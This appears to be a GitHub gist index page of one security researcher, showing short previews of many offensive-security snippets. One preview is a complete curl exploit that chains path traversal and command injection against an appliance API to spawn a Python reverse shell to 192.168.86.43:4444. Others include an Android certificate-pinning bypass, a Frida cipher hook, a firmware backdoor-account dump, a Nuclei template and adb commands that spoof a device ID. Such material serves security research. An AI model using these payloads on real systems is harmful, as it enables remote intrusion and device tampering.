This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import frida | |
| import json | |
| enc_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here | |
| dec_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here | |
| def my_message_handler(message, payload): | |
| #mainly printing the data sent from the js code, and managing the cipher objects according to their operation mode | |
| if message["type"] == "send": |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"192.168.86.43\\\",4444));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import string | |
| import warnings | |
| import json | |
| import argparse | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| warnings.simplefilter('ignore',InsecureRequestWarning) | |
| proxy = { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SoapClient | |
| SplFileObject | |
| tidy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setTimeout(function() { | |
| Java.perform(function() { | |
| console.log(''); | |
| console.log('======'); | |
| console.log('[#] Android Bypass for various Certificate Pinning methods [#]'); | |
| console.log('======'); | |
| var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
| var SSLContext = Java.use('javax.net.ssl.SSLContext'); |
numanturle
/ vuln.c
Created
July 19, 2023 08:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| snprintf(filename, PATH_MAX, "%s/%s", config->webroot, page); // vuln |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Use this script to test if a given TCP host/port are available | |
| WAITFORIT_cmdname=${0##*/} | |
| echoerr() { if [[ $WAITFORIT_QUIET -ne 1 ]]; then echo "$@" 1>&2; fi } | |
| usage() | |
| { | |
| cat << USAGE >&2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: cisco-ucs | |
| info: | |
| name: Cisco UCS Director | |
| author: numanturle | |
| severity: critical | |
| tags: cisco,cisco imc,cisco-imc | |
| requests: | |
| - method: GET |
numanturle
/ Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Last active
June 18, 2023 16:26
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin | |
| DECIMAL HEXADECIMAL DESCRIPTION | |
| -------------------------------------------------------------------------------- | |
| 131072 0x20000 JFFS2 filesystem, big endian | |
| JFFS2 filesystem extract | |
| total 1492 | |
| 1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| adb shell content query --uri content://settings/secure --where "name=\'android_id\'" | |
| adb shell content delete --uri content://settings/secure --where "name=\'android_id\'" | |
| adb shell content insert --uri content://settings/secure --bind name:s:android_id --bind value:s:7373de1e9e9670c2 |
NewerOlder